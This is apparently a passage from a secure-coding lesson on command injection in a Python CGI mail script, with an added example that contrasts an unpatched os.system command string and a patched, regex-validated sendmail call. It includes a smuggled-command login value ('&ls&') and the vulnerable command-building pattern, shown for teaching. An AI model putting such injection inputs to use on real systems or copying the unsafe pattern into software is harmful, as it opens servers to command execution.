copy parameter, specifying the list of users who are sent a copy of the email.
Line 59 also shows the os.system function. This is the way a Python script allows you to
execute an OS command, with the same effect as in PHP. It too is too generic.
According to our security design pattern, any generic kind of function call should be
substituted with a more specific function call that meets the purpose.
In our case, we should use a specific mail command. Since the mail command variable
contains the login variable from the initial user input, this vulnerability is very severe,
and is often classified as such by scanning tools.
Here we show how to patch this Python script.
Between lines 34 and 35, we insert
the regular expression matching functions.
If the result does not match, we print out the error message and
use the sys.exit() function to exit right away.

The input validation code is inserted
right after the input data is read, as you see right there.
After we read the full name, login, and password,
we insert that input validation code.
Line 79 uses the sendmail method of the imported
SMTP object from the SMTP library.

It is a specific function used to send email.
We are not using the os.system generic system call,
which you shouldn't use in your future programming practice.
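The unpatched and patched mail steps described above, as an added example that is not the course's own script: the mail command format, the admin address, the whitelist pattern and the function names are this example's assumptions, and the smtplib sendmail call is passed in as a parameter so the code runs without an SMTP server.

```python
import re
import sys

# Constructed sample inputs: a normal login, and the four-character string the
# page shows the unpatched script accepting.
GOOD_LOGIN = "alice"
BAD_LOGIN = "&ls&"

# Whitelist (example's own): letters, digits, dot, underscore, dash; 1 to 32 chars.
# Shell metacharacters (& ; | ` $ space ...) can never match it.
LOGIN_RE = re.compile(r"^[A-Za-z0-9._-]{1,32}$")

def validate_login(login):
    """The check the patch inserts right after the form values are read."""
    return LOGIN_RE.fullmatch(login) is not None

def build_mail_command(login, key_file):
    """UNPATCHED shape: the login lands inside a shell command string that the
    script would hand to os.system. Returned here, never executed, so you can
    see that '&ls&' splits one mail command into 'mail ... -c', then 'ls', then
    the rest: the shell runs ls in the cgi-bin directory, as the page describes."""
    return "mail -s 'your access key' -c %s admin@example.com < %s" % (login, key_file)

def send_key_mail(login, key_text, sendmail):
    """PATCHED shape: validate first, then deliver through a specific mail API.
    `sendmail` is smtplib.SMTP(host).sendmail in a real script; it is a
    parameter here so the function can be exercised offline."""
    if not validate_login(login):
        print("Error: login contains characters that are not allowed", file=sys.stderr)
        return False                      # the CGI script calls sys.exit() here
    msg = "Subject: your access key\n\n" + key_text
    sendmail("admin@example.com", [login + "@example.com"], msg)
    return True

if __name__ == "__main__":
    print(build_mail_command(BAD_LOGIN, "keys.txt"))   # the injected command
    def fake_sendmail(frm, to, msg):                  # stand-in for smtplib
        print("would send to", to)
    send_key_mail(GOOD_LOGIN, "KEY=<placeholder>", fake_sendmail)
    send_key_mail(BAD_LOGIN, "KEY=<placeholder>", fake_sendmail)
```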
